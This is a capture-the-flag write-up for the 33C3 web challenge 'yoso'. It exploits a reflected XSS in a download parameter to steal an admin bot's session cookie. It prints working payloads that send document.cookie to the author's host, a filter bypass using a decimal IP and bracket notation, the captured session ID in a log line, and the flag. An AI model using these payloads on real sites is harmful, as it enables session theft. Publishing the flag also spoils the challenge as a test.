#yoso(web, 250, 38 solves)
You only live once, so why search twice?
(admins love to search for flags btw)
We are able to send a link to admin, which he then visits. Our goal is to download admin's bookmarks.
After some investigation, we found a reflected xss at http://78.46.224.80:1337/download.php?zip=<script>alert("hello world")</script>
So all we have to do now is either steal the admins'c cookie or get the zip with a ajax/xmlhttp request and then send a request to ourdomain.com/+data. We'll go with the first option, as it's a lot easier.
Payload:
<script> window.location = "http://nazywam.host/itWorks!"+document.cookie </script>Unfortunately, the zip parameter is filtered, all dots are removed. So we have to find a way to bypass it.
nazywam.hostcan be easily changed into a decimal ip,1558071511window.locationanddocument.cookiecan be written aswindow["location"]anddocument["cookie"]string + string->string["concat"](string)
Final payload:
<script>window["location"] = "http://1558071511/itWorks!"["concat"](document["cookie"]) </script>This allows us to get the cookie
78.46.224.80 - - [29/Dec/2016:11:46:48 +0100] "GET /itWorks!PHPSESSID=ol8gur9chbfq0g0ufnm6h8vrc1 HTTP/1.1" 404 143 "http://78.46.224.80:1337/download.php?zip=%3Cscript%3Ewindow[%22location%22]%20=%20%22http://1558071511/itWorks!%22[%22concat%22](document[%22cookie%22])%20%3C/script%3E" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
And finally, the flag: 33C3_lol_wHo_needs_scr1pts_anyway